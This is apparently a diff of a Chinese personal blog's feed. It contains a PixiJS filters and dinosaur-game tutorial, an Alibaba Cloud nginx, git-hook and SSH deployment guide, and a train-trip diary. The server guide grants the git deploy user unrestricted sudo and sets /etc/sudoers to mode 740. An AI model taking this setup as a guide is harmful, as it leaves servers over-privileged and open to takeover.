    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加到舞台
    app.stage.addChild(sprite);

    //创建轮廓滤镜
    const outlineFilter = new PIXI.filters.OutlineFilter(5, 0xffff00); // 2为轮廓宽度,0x000000为轮廓颜色
    // 创建发光滤镜
    const glowFilter = new PIXI.filters.GlowFilter({
    distance: 50,
    outerStrength: 1,
    innerStrength: 0,
    color: 0xff0000,
    quality: 0.5,
    });
    //将轮廓滤镜添加到精灵上
    sprite.filters = [outlineFilter, glowFilter];

    演示

    09-应用Pixi实现波浪水滴特效主页

    ​ 创建场景:一个背景以及一个带阴影的文字对象。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 抗锯齿
    });

    // 将应用画布添加到DOM中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/car.jpg");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    sprite.width = app.screen.width;
    sprite.height = app.screen.height;

    // 创建容器
    const container = new PIXI.Container();
    // 将精灵添加到容器中
    container.addChild(sprite);
    // 将容器添加到舞台
    app.stage.addChild(container);

    // 添加文字
    const text = new PIXI.Text("Hello PixiJS", {
    fontFamily: "Arial",
    fontSize: 30 + Math.floor(app.screen.width * 0.1),
    fill: 0xffffff,
    align: "center",
    dropShadow: true,
    dropShadowColor: "#000000",
    dropShadowBlur: 4,
    dropShadowAngle: Math.PI / 2,
    dropShadowDistance: 2,
    });
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;
    text.anchor.set(0.5);
    container.addChild(text);

    09_1

    ​ 添加置换滤镜:

    1
    2
    3
    4
    5
    6
    // 添加置换滤镜
    const displacementSprite = PIXI.Sprite.from("./textures/displacement.jpg");
    displacementSprite.scale.set(0.5);
    displacementSprite.texture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;
    const displacementFilter = new PIXI.DisplacementFilter(displacementSprite);
    container.addChild(displacementSprite);

    ​ 一个置换图 displacement.jpg 实现画面涟漪的效果:

    displacement.jpg

    ​ 定义大、中、小三种震波滤镜(需要pixi-filter 支持):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    // 添加震波滤镜
    const shockwaveFilter1 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 80, //半径
    waveLength: 40, //波长
    amplitude: 40, //振幅
    speed: 200,
    },
    0
    );

    const shockwaveFilter2 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 100, //半径
    waveLength: 45, //波长
    amplitude: 80, //振幅
    speed: 240,
    },
    0
    );

    const shockwaveFilter3 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 160, //半径
    waveLength: 65, //波长
    amplitude: 105, //振幅
    speed: 300,
    },
    0
    );

    ​ 应用这些滤镜(app.ticker.add 有点像 Unity 里的 Update()):

    1
    2
    3
    4
    5
    6
    container.filters = [
    displacementFilter,
    shockwaveFilter1,
    shockwaveFilter2,
    shockwaveFilter3,
    ];

    ​ 随机创建震波滤镜:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    app.ticker.add((delta) => {
    displacementSprite.x += 1;
    displacementSprite.y += 1;
    createWave(shockwaveFilter1, 1);
    createWave(shockwaveFilter2, 1.2);
    createWave(shockwaveFilter3, 0.7);
    });

    function createWave(waveFilter, resetTime) {
    waveFilter.time += 0.01;
    if (waveFilter.time > resetTime) {
    waveFilter.time = 0;
    waveFilter.center = [
    Math.random() * app.screen.width,
    Math.random() * app.screen.height,
    ];
    }
    }

    ​ 设置点击创建震波滤镜的效果:

    1
    2
    3
    4
    5
    6
    // 监听点击事件,根据位置创建震波滤镜
    app.view.addEventListener("click", (e) => {
    console.log(e.clientX, e.clientY);
    shockwaveFilter3.center = [e.clientX, e.clientY];
    shockwaveFilter3.time = 0;
    });

    演示

    10-pixijs开发谷歌恐龙跑酷小游戏

    ​ 我在原教程的基础上魔改了一些内容。

    ​ 创建应用,导入 baseTexture(是一个雪碧图):

    雪碧图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0xffffff,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 抗锯齿
    });

    // 将应用画布添加到DOM中
    document.body.appendChild(app.view);

    // 创建容器
    const container = new PIXI.Container();

    // 将容器添加到舞台
    app.stage.addChild(container);

    // 添加恐龙小游戏的精灵纹理
    const baseTexture = PIXI.BaseTexture.from("./textures/game.png");

    ​ 设置恐龙的宽高:

    1
    2
    const frameWidth = 88;
    const frameHeight = 100;

    ​ 创建各种资源:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    // 创建恐龙纹理
    const dinoTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(75, 0, frameWidth, frameHeight)
    );
    // 创建恐龙精灵
    const dino = new PIXI.Sprite(dinoTexture);
    dino.visible = false;
    container.addChild(dino);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    // 恐龙跑步动画;
    const runTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1675, 0, frameWidth, frameHeight)
    );
    const runSprite = new PIXI.Sprite(runTexture);
    runSprite.visible = false;
    container.addChild(runSprite);

    let runTextures = [];
    for (let i = 0; i < 2; i++) {
    runTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (2 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
    const runAnimation = new PIXI.AnimatedSprite(runTextures);
    runAnimation.animationSpeed = 0.1;
    runAnimation.play();
    runAnimation.visible = false;
    container.addChild(runAnimation);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // 恐龙死亡动画;
    let deadTextures = [];
    for (let i = 0; i < 2; i++) {
    deadTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (0 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
    const deadAnimation = new PIXI.AnimatedSprite(deadTextures);
    deadAnimation.animationSpeed = 0.1;
    deadAnimation.play();
    deadAnimation.visible = false;
    container.addChild(deadAnimation);
    1
    2
    3
    4
    5
    6
    7
    8
    // 恐龙跳跃精灵
    const jumpTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680, 0, 82, frameHeight)
    );
    const jumpSprite = new PIXI.Sprite(jumpTexture);
    jumpSprite.visible = false;
    container.addChild(jumpSprite);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // 地面精灵
    const groundTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(50, 100, 2300, 30)
    );
    // 设置纹理水平镜像重复
    groundTexture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;

    const groundSprite = new PIXI.TilingSprite(groundTexture);
    groundSprite.width = window.innerWidth;
    groundSprite.height = 30;
    // 设置地面精灵的位置
    groundSprite.position.set(0, window.innerHeight - 50);

    container.addChild(groundSprite);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    // 仙人掌精灵
    const cactusTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(515, 0, 30, 60)
    );
    const cactusSprite = new PIXI.Sprite(cactusTexture);
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 1.5);
    cactusSprite.y = window.innerHeight - 50 - 50;
    container.addChild(cactusSprite);

    ​ 创建提示文字,点击 开始游戏 时,开始游戏:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    // 创建文字
    let hintsText = new PIXI.Text("开始游戏", {
    fontSize: 30,
    fill: 0x333333,
    align: "center",
    });
    hintsText.x = app.screen.width / 2;
    hintsText.y = app.screen.height / 2;
    hintsText.anchor.set(0.5);
    container.addChild(hintsText);
    hintsText.interactive = true;
    hintsText.on("click", () => {
    playGame();
    });
    hintsText.addEventListener('touchstart', function (event) {
    playGame();
    });

    ​ 开始游戏的逻辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    let isGameing = false;
    let score = 0;
    let jumpVelocity = 1200; // 跳跃初速度,单位:像素/秒
    let gravity = 5000; // 重力加速度,单位:像素/秒^2

    // 开始游戏
    function playGame(e) {
    hintsText.text = "得分:" + score;
    // 恐龙跑步动画;
    runAnimation.x = 60;
    runAnimation.y = window.innerHeight - 50 - frameHeight;
    runAnimation.visible = true;
    // 恐龙死亡动画;
    deadAnimation.x = 60;
    deadAnimation.y = window.innerHeight - 50 - frameHeight;
    deadAnimation.visible = false;
    // 恐龙跳跃精灵
    jumpSprite.x = 60;
    jumpSprite.y = window.innerHeight - 50 - frameHeight;
    jumpSprite.visible = false;

    // 移除开始游戏的点击和触摸事件监听器
    hintsText.interactive = false;
    hintsText.off("click");
    hintsText.removeEventListener('touchstart', playGame);

    // 可以考虑在这里添加一个小延迟再添加跳跃的事件监听器,以避免立即触发跳跃
    setTimeout(() => {
    window.addEventListener("keydown", (e) => {
    if (e.code === "Space") {
    jump();
    }
    });
    app.view.addEventListener('click', jump);
    app.view.addEventListener('touchstart', jump);
    }, 100); // 延迟 100 毫秒添加跳跃事件监听器

    isGameing = true;
    }

    ​ 跳跃逻辑:

    1
    2
    3
    4
    5
    6
    7
    function jump() {
    if (isGameing && !jumpSprite.visible) {
    runAnimation.visible = false;
    jumpSprite.visible = true;
    jumpVelocity = 1200; // 确保每次跳跃前都重置了跳跃速度
    }
    }

    ​ 实时控制游戏逻辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    app.ticker.add((delta) => {
    if (isGameing) {
    hintsText.text = "得分:" + score;
    // 获取自上一帧以来的秒数
    let deltaTime = app.ticker.deltaMS / 1000;
    // 计算基于时间的移动距离
    const groundSpeed = 1000 * deltaTime * Math.log10(10 + score);
    const cactusSpeed = groundSpeed;
    // 地面精灵
    groundSprite.tilePosition.x -= groundSpeed;
    // 仙人掌精灵
    cactusSprite.x -= cactusSpeed;

    if (cactusSprite.x <= -30) {
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 2);
    score++;
    }

    if (jumpSprite.visible) {
    // 根据deltaTime调整跳跃速度和重力
    jumpVelocity -= gravity * deltaTime; // 跳跃速度随时间减小
    jumpSprite.y -= jumpVelocity * deltaTime; // 根据跳跃速度更新位置

    // 检查是否落地
    if (jumpSprite.y >= window.innerHeight - 50 - frameHeight) {
    console.log("跳跃结束");
    jumpSprite.y = window.innerHeight - 50 - frameHeight; // 确保不会穿过地面
    runAnimation.visible = true;
    jumpSprite.visible = false;
    }
    }

    // 判断跳跃精灵与仙人掌精灵是否碰撞
    if (
    jumpSprite.y > cactusSprite.y - 60 &&
    jumpSprite.x + 60 > cactusSprite.x &&
    jumpSprite.x - 60 < cactusSprite.x
    ) {
    // 游戏结束
    gameOver();
    }
    } else {
    return;
    }
    });

    ​ 游戏结束逻辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    function gameOver() {
    console.log("游戏结束");
    // 游戏结束
    isGameing = false;
    deadAnimation.visible = true;
    runAnimation.visible = false;
    jumpSprite.visible = false;
    hintsText.text = "游戏结束,最后得分:" + score;
    hintsText.interactive = true;
    hintsText.on("click", () => {
    location.reload();
    });
    hintsText.addEventListener('touchstart', function (event) {
    location.reload();
    });
    }

    演示(emmm 手机上玩起来适配还不是很好……)

    ]]>
    @@ -3252,7 +3252,7 @@ /posts/Server-%E9%98%BF%E9%87%8C%E4%BA%91%20ECS/ - 正文

    白嫖服务器!

    ​ 去下面这个链接领一个 3 个月的学生服务器:

    白嫖服务器

    MobaXterm 连接服务器

    ​ 在服务器控制台中设置远程连接:

    重置连接

    ​ 重置连接密码:

    重置密码

    ​ MobaXterm 下设置好对应的公网 IP,以 root 用户连接:

    设置连接参数

    ​ 输好密码,成功连接!

    开冲!

    Nginx

    安装 Nginx

    ​ 下面的操作基本按照下面的连接来做:

    ​ 新建一个文件夹并转到该目录 /usr/local/nginx 下以存放 nginx:

    mkdir /usr/local/nginx
    cd /usr/local/nginx

    ​ 从 nginx: download 里下载一个 nginx,这里是 nginx-1.24.0.tar.gz,上传到服务器并解压:

    tar -xvf nginx-1.24.0.tar.gz

    解压 nginx

    ​ 转到这个文件夹 /usr/local/nginx/nginx-1.24.0/ 下:

    cd /usr/local/nginx/nginx-1.24.0/

    ​ 安装 nginx:

    yum -y install gcc zlib zlib-devel pcre-devel openssl openssl-devel
    ./configure --with-http_stub_status_module --with-http_ssl_module
    make
    make install

    ​ 启动 Nginx:

    cd /usr/local/nginx/sbin
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 查看 Nginx 是否启动成功(这个进程是否在运行):

    ps -ef | grep nginx

    查看是否在运行

    NginX 相关命令:

    • 重新加载 nginx 配置文件并重启 nginx:
    ./nginx -s reload
    • 启动 nginx:
    ./nginx
    • 强制停止 nginx:
    ./nginx -s stop
    • 优雅的停止 nginx:
    ./nginx -s quit
    • 查看 nginx 的版本:
    nginx -v
    • 杀死所有 nginx 进程:
    killall nginx
    • 查看 nginx 是否启动:
    ps -ef | grep nginx # 

    开放 80 端口

    ​ 配置 80 端口并关闭 Linux 防火墙:

    systemctl status firewalld
    firewall-cmd --zone=public --add-port=80/tcp --permanent
    firewall-cmd --reload

    ​ 阿里云控制台下,设置 安全组 让任何 IP 都可访问 80 端口。

    设置端口

    开跑!

    ​ 浏览器下输入服务器公网 IP(124.41.23.XXX):

    访问网页

    配置 Ningx 指向的页面(如果要用 git,这章可跳过)

    ​ 新建一个文件夹以存放静态网页的页面:

    cd /
    mkdir work
    cd /work
    mkdir statics

    ​ 将静态网页的资源传到这个文件夹下:

    传送资源

    ​ 进 /usr/local/nginx/conf/,编辑 nginx.conf,修改 http{} 里的 server 属性(将 location404 页面换成自己的):

    server {
    listen 80;
    server_name localhost;

    #charset koi8-r;

    #access_log logs/host.access.log main;

    location / {
    root /work/statics/;
    index index.html index.htm;
    }

    error_page 404 /404.html;
    location = /404.html {
    root /work/statics/;
    }

    ...

    ​ 重启 NginX 服务:

    cd /usr/local/nginx/sbin
    ./nginx -s quit
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 进服务器公网 IP(124.41.23.XXX)查看页面及 404 页面是否有效。

    git

    安装 git

    ​ 安装 git:

    yum install git

    ​ 添加一个账户 git,用于控制推送:

    useradd git

    ​ 给这个 git 账户加点权限:

    chmod 740 /etc/sudoers
    vim /etc/sudoers

    ​ 添加:

    git        ALL=(ALL)     ALL

    加权限

    ​在插入模式下按下 Ctrl + O,然后输入 :wq 并按下回车键,vim 将保存文件并退出。

    passwd git

    git 账户

    • 为本地的 hexo_blog 配置一个部署静态文件的远程仓库。

    ​ 创建私有 Git 仓库,在 /var/repo/ 下,创建一个名为 hexo_static 的裸仓库(bare repo)
    ​ 如果没有 /var/repo 目录,需要先创建;然后修改目录的所有权和用户权限,之后 git 用户都具备 /var/repo 目录下所有新生成的目录和文件的权限。

    ​ 此时为 root 用户登录:

    mkdir /var/repo/
    chown -R git:git /var/repo/
    chmod -R 755 /var/repo/
    cd /var/repo/
    git init --bare hexo_static.git
    • 创建 /var/www/hexo 目录,用于 Nginx 托管(即,这个文件夹将存放静态网页的全部文件)。
    mkdir -p /var/www/hexo

    ​ 加点权限:

    chown -R git:git /var/www/hexo
    chmod -R 755 /var/www/hexo

    ​ 进 /usr/local/nginx/conf/,编辑 nginx.conf,修改 http{} 里的 server 属性(将 location404 页面换成/var/www/hexo/):

    server {
    listen 80;
    server_name localhost;

    #charset koi8-r;

    #access_log logs/host.access.log main;

    location / {
    root /var/www/hexo/;
    index index.html index.htm;
    }

    error_page 404 /404.html;
    location = /404.html {
    root /var/www/hexo/;
    }

    ...

    ​ 重启 NginX 服务:

    cd /usr/local/nginx/sbin
    ./nginx -s quit
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 接下来,在云服务器上的裸仓库 hexo_static 创建一个钩子,在满足特定条件时将静态 HTML 文件传送到 Web 服务器的目录下,即 /var/www/hexo

    ​ 在自动生成的 hooks 目录下创建一个新的钩子文件:

    vim /var/repo/hexo_static.git/hooks/post-receive

    ​ 往里面添加:

    #!/bin/bash
    git --work-tree=/var/www/hexo --git-dir=/var/repo/hexo_static.git checkout -f

    配置钩子

    ​ 保存并退出文件,并让该文件变为可执行文件。

    chmod +x /var/repo/hexo_static.git/hooks/post-receive

    hexo 推送到 git

    ​ 在 hexo 项目的 _config.yml 中,设置部署到服务器上:

    账户@服务器 IP:推送地址

    这是多部署!

    ​ 开始推送!

    hexo d

    ​ 非常不幸地,这个网址会因为不使用 HTTPS 而导致加密插件失效……


    SSH 免密登录与 git 推送

    ​ 这样推送会要你输入密码,接下来尝试在本地建立 SSH 信任关系以实现免密登录!

    ​ MobaXterm 下 root 账户打开 RSA 认证:

    vim /etc/ssh/sshd_config

    ​ 最下方添加几行:

    RSAAuthentication yes
    PubkeyAuthentication yes
    AuthorizedKeysFile .ssh/authorized_keys

    加几行!

    ​ 配置 SSH:

    su git
    mkdir /home/git/.ssh
    vim /home/git/.ssh/authorized_keys

    ​ 将 Windows 下 C:/用户/用户名/.ssh/id_rsa.pub 下的内容:

    id_rsa.pub

    ​ 拷贝到服务器的 /home/git/.ssh/authorized_keys 中:

    配置 SSH

    ​ 给这个文件一点权限:

    chmod 600 /home/git/.ssh/authorized_keys
    chmod 700 /home/git/.ssh/

    ​ 此时本机上命令(尝试以 git 账户登录服务器):

    ssh git@121.41.23.XXX

    ​ 登录便不需要密码!hexo d 命令同理。

    免密登录!

    设置域名

    购买域名!

    ​ 买一个域名!

    ​ 要实名认证才可以使用!进去操作一番,直到审核通过域名可以解析为止。

    完成域名解析!

    ​ 添加域名解析,将记录值设置为所购买的服务器所提供的公网 IP:

    添加域名解析

    ​ 过段时间进自己的二级域名(www.gz-metal-cell.top)就会获得与进服务器公网 IP (124.41.23.XXX) 一样的效果!

    ngnix

    ​ 但是如果设置好了 Ningx 页面的话,就会要你备案后才能使用了……(免费的服务器不让你备案呜呜呜)

    给我备案!

    ]]>
    + 正文

    白嫖服务器!

    ​ 去下面这个链接领一个 3 个月的学生服务器:

    白嫖服务器

    MobaXterm 连接服务器

    ​ 在服务器控制台中设置远程连接:

    重置连接

    ​ 重置连接密码:

    重置密码

    ​ MobaXterm 下设置好对应的公网 IP,以 root 用户连接:

    设置连接参数

    ​ 输好密码,成功连接!

    开冲!

    Nginx

    安装 Nginx

    ​ 下面的操作基本按照下面的连接来做:

    ​ 新建一个文件夹并转到该目录 /usr/local/nginx 下以存放 nginx:

    1
    2
    mkdir /usr/local/nginx
    cd /usr/local/nginx

    ​ 从 nginx: download 里下载一个 nginx,这里是 nginx-1.24.0.tar.gz,上传到服务器并解压:

    1
    tar -xvf nginx-1.24.0.tar.gz

    解压 nginx

    ​ 转到这个文件夹 /usr/local/nginx/nginx-1.24.0/ 下:

    1
    cd /usr/local/nginx/nginx-1.24.0/

    ​ 安装 nginx:

    1
    2
    3
    4
    yum -y install gcc zlib zlib-devel pcre-devel openssl openssl-devel
    ./configure --with-http_stub_status_module --with-http_ssl_module
    make
    make install

    ​ 启动 Nginx:

    1
    2
    3
    cd /usr/local/nginx/sbin
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 查看 Nginx 是否启动成功(这个进程是否在运行):

    1
    ps -ef | grep nginx

    查看是否在运行

    NginX 相关命令:

    • 重新加载 nginx 配置文件并重启 nginx:
    1
    ./nginx -s reload
    • 启动 nginx:
    1
    ./nginx
    • 强制停止 nginx:
    1
    ./nginx -s stop
    • 优雅的停止 nginx:
    1
    ./nginx -s quit
    • 查看 nginx 的版本:
    1
    nginx -v
    • 杀死所有 nginx 进程:
    1
    killall nginx
    • 查看 nginx 是否启动:
    1
    ps -ef | grep nginx # 

    开放 80 端口

    ​ 配置 80 端口并关闭 Linux 防火墙:

    1
    2
    3
    systemctl status firewalld
    firewall-cmd --zone=public --add-port=80/tcp --permanent
    firewall-cmd --reload

    ​ 阿里云控制台下,设置 安全组 让任何 IP 都可访问 80 端口。

    设置端口

    开跑!

    ​ 浏览器下输入服务器公网 IP(124.41.23.XXX):

    访问网页

    配置 Ningx 指向的页面(如果要用 git,这章可跳过)

    ​ 新建一个文件夹以存放静态网页的页面:

    1
    2
    3
    4
    cd /
    mkdir work
    cd /work
    mkdir statics

    ​ 将静态网页的资源传到这个文件夹下:

    传送资源

    ​ 进 /usr/local/nginx/conf/,编辑 nginx.conf,修改 http{} 里的 server 属性(将 location404 页面换成自己的):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    server {
    listen 80;
    server_name localhost;

    #charset koi8-r;

    #access_log logs/host.access.log main;

    location / {
    root /work/statics/;
    index index.html index.htm;
    }

    error_page 404 /404.html;
    location = /404.html {
    root /work/statics/;
    }

    ...

    ​ 重启 NginX 服务:

    1
    2
    3
    4
    cd /usr/local/nginx/sbin
    ./nginx -s quit
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 进服务器公网 IP(124.41.23.XXX)查看页面及 404 页面是否有效。

    git

    安装 git

    ​ 安装 git:

    1
    yum install git

    ​ 添加一个账户 git,用于控制推送:

    1
    useradd git

    ​ 给这个 git 账户加点权限:

    1
    2
    chmod 740 /etc/sudoers
    vim /etc/sudoers

    ​ 添加:

    1
    git        ALL=(ALL)     ALL

    加权限

    ​在插入模式下按下 Ctrl + O,然后输入 :wq 并按下回车键,vim 将保存文件并退出。

    1
    passwd git

    git 账户

    • 为本地的 hexo_blog 配置一个部署静态文件的远程仓库。

    ​ 创建私有 Git 仓库,在 /var/repo/ 下,创建一个名为 hexo_static 的裸仓库(bare repo)
    ​ 如果没有 /var/repo 目录,需要先创建;然后修改目录的所有权和用户权限,之后 git 用户都具备 /var/repo 目录下所有新生成的目录和文件的权限。

    ​ 此时为 root 用户登录:

    1
    2
    3
    4
    5
    mkdir /var/repo/
    chown -R git:git /var/repo/
    chmod -R 755 /var/repo/
    cd /var/repo/
    git init --bare hexo_static.git
    • 创建 /var/www/hexo 目录,用于 Nginx 托管(即,这个文件夹将存放静态网页的全部文件)。
    1
    mkdir -p /var/www/hexo

    ​ 加点权限:

    1
    2
    chown -R git:git /var/www/hexo
    chmod -R 755 /var/www/hexo

    ​ 进 /usr/local/nginx/conf/,编辑 nginx.conf,修改 http{} 里的 server 属性(将 location404 页面换成/var/www/hexo/):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    server {
    listen 80;
    server_name localhost;

    #charset koi8-r;

    #access_log logs/host.access.log main;

    location / {
    root /var/www/hexo/;
    index index.html index.htm;
    }

    error_page 404 /404.html;
    location = /404.html {
    root /var/www/hexo/;
    }

    ...

    ​ 重启 NginX 服务:

    1
    2
    3
    4
    cd /usr/local/nginx/sbin
    ./nginx -s quit
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 接下来,在云服务器上的裸仓库 hexo_static 创建一个钩子,在满足特定条件时将静态 HTML 文件传送到 Web 服务器的目录下,即 /var/www/hexo

    ​ 在自动生成的 hooks 目录下创建一个新的钩子文件:

    1
    vim /var/repo/hexo_static.git/hooks/post-receive

    ​ 往里面添加:

    1
    2
    #!/bin/bash
    git --work-tree=/var/www/hexo --git-dir=/var/repo/hexo_static.git checkout -f

    配置钩子

    ​ 保存并退出文件,并让该文件变为可执行文件。

    1
    chmod +x /var/repo/hexo_static.git/hooks/post-receive

    hexo 推送到 git

    ​ 在 hexo 项目的 _config.yml 中,设置部署到服务器上:

    账户@服务器 IP:推送地址

    这是多部署!

    ​ 开始推送!

    1
    hexo d

    ​ 非常不幸地,这个网址会因为不使用 HTTPS 而导致加密插件失效……


    SSH 免密登录与 git 推送

    ​ 这样推送会要你输入密码,接下来尝试在本地建立 SSH 信任关系以实现免密登录!

    ​ MobaXterm 下 root 账户打开 RSA 认证:

    1
    vim /etc/ssh/sshd_config

    ​ 最下方添加几行:

    1
    2
    3
    RSAAuthentication yes
    PubkeyAuthentication yes
    AuthorizedKeysFile .ssh/authorized_keys

    加几行!

    ​ 配置 SSH:

    1
    2
    3
    su git
    mkdir /home/git/.ssh
    vim /home/git/.ssh/authorized_keys

    ​ 将 Windows 下 C:/用户/用户名/.ssh/id_rsa.pub 下的内容:

    id_rsa.pub

    ​ 拷贝到服务器的 /home/git/.ssh/authorized_keys 中:

    配置 SSH

    ​ 给这个文件一点权限:

    1
    2
    chmod 600 /home/git/.ssh/authorized_keys
    chmod 700 /home/git/.ssh/

    ​ 此时本机上命令(尝试以 git 账户登录服务器):

    1
    ssh git@121.41.23.XXX

    ​ 登录便不需要密码!hexo d 命令同理。

    免密登录!

    设置域名

    购买域名!

    ​ 买一个域名!

    ​ 要实名认证才可以使用!进去操作一番,直到审核通过域名可以解析为止。

    完成域名解析!

    ​ 添加域名解析,将记录值设置为所购买的服务器所提供的公网 IP:

    添加域名解析

    ​ 过段时间进自己的二级域名(www.gz-metal-cell.top)就会获得与进服务器公网 IP (124.41.23.XXX) 一样的效果!

    ngnix

    ​ 但是如果设置好了 Ningx 页面的话,就会要你备案后才能使用了……(免费的服务器不让你备案呜呜呜)

    给我备案!

    ]]>
    @@ -3337,7 +3337,7 @@ /posts/Diary-%E8%B5%A3%E4%BA%86%EF%BC%8C%E5%8F%88%E5%8F%88%E9%97%BD%E4%BA%86%EF%BC%88%E4%B8%80%EF%BC%89/ - 前言
            

    正文

    买票

    ​ 这次回家决定中转一次南昌,和伟哥商量完后觉得买卧铺比较合适,躺一晚上就到了,价格还比较便宜🤔。

    车票

    ​ 伟哥对南昌没有兴趣捏,自己定一个单人间,看一看南昌还有个叫福州路的地方,而且还是市中心?¥132.30,整!

    住宿

    1.19

    14:38 保定站

    保定站

    ​ 中午买好三明治和饭团,14:00 出发前往保定站,在冀 F 的生活要告一段落了。

    14:56 候车

    候车中

    ​ 车次信息:T167

    站名进站时间
    保定15:26
    石家庄17:01
    邯郸18:33
    安阳19:22
    新乡20:24
    郑州21:19
    漯河22:45
    信阳00:15
    武昌03:03
    黄石04:41
    阳新05:12
    瑞昌05:56
    南昌07:27

    ​ 研究了一下这车次还蛮浪漫的,21:00 过黄河,0:00 过淮河,3:00 过长江,1.19 我还是北方人,1.20 我就是南方人了😎!

    15:38 再见冀 F!

    👋

    ​ 绿皮火车的进站到发车时间还挺短,进来以后发现车厢在后面,走过去结果响铃了😅,最后大包小包一阵跑才上了车。

    15:45 烟火气

    车厢内

    ​ 幸好保定站离始发站近,进来以后卧铺旁边还有椅子可以坐😍。

    15:46 中国保定

    某桥

    ​ 从南边逐渐离开了中国保定。

    16:52 石家庄

    淮安桥

    ​ 石家庄槐安桥。

    17:23 零食 Party

    开吃!

    ​ 跟伟哥吃零食唠嗑打发时间。期间还玩起了成语接龙和写同音字的游戏,美丽泉州哥口音不标准是有原因的,他连拼音都没搞清楚😇。

    18:33 邯郸

    夜幕降临

    ​ 天色渐晚,还是没得出河北😇。窗外的风景逐渐看不见了。

    21:06 郑州

    郑州

    ​ 聊着聊着没注意啥时候过了黄河😅。

    ​ 列车员说 22:00 熄灯,我们 21:30 就开躺了。

    太窄了这床
    而且这车也太抖了
    确实啊
    可恶
    凑合着睡吧
    晚安伟哥

    ​ 好久没体验过卧铺了,真是挤啊😅,而且这车况且况且的,注定是一个不眠夜了。

    1.20

    02:39 武汉长江大桥

    武汉长江大桥

    ​ 也不知道睡着了没,半睡半醒的,拿起手机发现即将过了长江。

    我现在应该离小迷糊挺远的

    07:17 南昌

    某桥

    ​ 最后况且况且到 6:00 彻底醒了,索性就下来看看风景了,窗外已不是一片白茫茫,而是绿树成荫。这就是南方!

    ​ 比起河北一片大空地,窗外有些建筑还有些江南水乡的感觉。

    07:29 南昌站

    南昌站

    ​ 下车!

    真爽

    07:45 美丽泉州哥

